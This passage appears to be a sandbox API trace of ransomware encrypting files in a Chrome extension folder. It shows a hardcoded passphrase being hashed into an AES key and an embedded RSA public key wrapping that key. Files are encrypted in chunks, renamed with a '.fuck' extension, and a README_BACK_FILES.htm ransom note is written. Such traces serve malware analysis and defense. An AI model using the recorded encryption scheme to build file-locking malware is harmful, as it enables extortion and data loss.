pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.950] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.950] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.950] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.951] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.951] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.951] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.951] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.951] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x29f, lpOverlapped=0x0) returned 1 [0262.951] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x29f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0262.951] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0262.951] CloseHandle (hObject=0x5d5c) returned 1 [0262.951] CloseHandle (hObject=0x5d60) returned 1 [0262.951] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0262.954] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0262.954] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.gsg")) returned 1 [0262.956] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.fuck")) returned 1 [0262.957] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.957] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.957] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.957] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.957] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.957] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0262.957] AreFileApisANSI () returned 1 [0262.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.958] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.958] GetFileType (hFile=0x5d64) returned 0x1 [0262.958] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.959] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.960] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.960] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.960] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.960] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.960] GetLastError () returned 0x0 [0262.960] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json")) returned 0x20 [0262.960] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json", dwFileAttributes=0x80) returned 1 [0262.960] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.961] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.962] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.963] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.964] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.964] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.964] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.964] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0262.965] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.965] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.965] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74780) returned 1 [0262.965] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74780, dwCertEncodingType=0x1, pInfo=0x2ead830*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead860*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead868*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e640) returned 1 [0262.965] CryptEncrypt (in: hKey=0x2e7e640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.965] CryptEncrypt (in: hKey=0x2e7e640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74098*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74098*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.965] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e74098*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74098*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.967] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.977] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.977] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.983] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.983] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.983] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.983] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.983] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.984] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.984] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.984] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.984] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.984] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.984] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.984] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.985] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, 